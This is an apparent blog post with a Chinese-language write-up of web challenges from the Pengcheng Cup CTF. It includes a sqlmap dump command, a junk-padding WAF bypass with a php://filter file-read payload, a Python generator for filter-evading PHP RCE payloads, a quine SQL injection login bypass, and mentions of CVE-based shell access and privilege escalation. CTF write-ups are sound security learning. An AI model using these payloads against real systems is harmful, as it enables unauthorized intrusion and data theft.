鹏城杯--web赛题 WP

比完了才想起来写一篇文章orz

Easygo

直接用sqlmap就可以跑出flag
python sqlmap.py -u http://xxx.xxx --dump
image

简单包含

打开就遇到一个防火墙,看图片像是创宇的防火墙
image
经过一系列尝试最后通过垃圾数据绕过
payload大概是这样

a=................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................&a=php://filter/read=convert.base64-encode/resource=flag.php

然后将回显的base64编码内容拿去解码
image

简单的php400

打开题目

image
对code参数进行了一大堆过滤,提示是二维数组,但是构造了半天没解出来
当时就猜到,可能异或也能做出来
后悔没早点学异或Rce(书到用时方恨少QAQ

结束后看了大佬的脚本

def one(s):
    ss = ""
    for each in s:
        ss += "%" + str(hex(255 - ord(each)))[2:].upper()
    return f"[~{ss}][!%FF]("

while 1:
    a = input(":>").strip(")")
    aa = a.split("(")
    s = ""
    for each in aa[:-1]:
        s += one(each)
    s += ")" * (len(aa) - 1) + ";"
    print(s)

利用脚本构造的异或pyload即可直接绕过过滤

can_u_login350

不会做。参考其他文章说是quine注入、
pyload是

password='//union//select//replace(replace('"//union//select//replace(replace("%",0x22,0x27),0x25,"%")%23',0x22,0x27),0x25,'"//union//select/**/replace(replace("%",0x22,0x27),0x25,"%")%23')%23

高手高手高手

不会。貌似是用的CVE-2018-17552
https://cn.0day.today/exploit/31277
image

比赛结束后看其他大佬的wp说通过访问package.zip拿到源码后通过msf来getshell,然后用CVE-2021-4034来提权即可拿到flag


部分内容转自
https://mp.weixin.qq.com/s?__biz=Mzg3MTMyMzcxOA==&mid=2247484238&idx=1&sn=89b22714e82886f1c33f3133f0cbbb5d&chksm=ce810267f9f68b717b731474bd3054cea5e68e0b0337a37bd3fef7290e509ca9b7e0eb725b12&mpshare=1&scene=23&srcid=0705RDy5TgSA1W9UWo5mTyrB&sharer_sharetime=1657031773763&sharer_shareid=0a1d87ab761c9e57a428b8937dec2b29

posted @   LinkPoc  阅读(100)  评论(0编辑  收藏  举报
相关博文:
阅读排行:
· PowerShell开发游戏 · 打蜜蜂
· 在鹅厂做java开发是什么体验
· 百万级群聊的设计实践
· WPF到Web的无缝过渡:英雄联盟客户端的OpenSilver迁移实战
· 永远不要相信用户的输入:从 SQL 注入攻防看输入验证的重要性
点击右上角即可分享
微信分享提示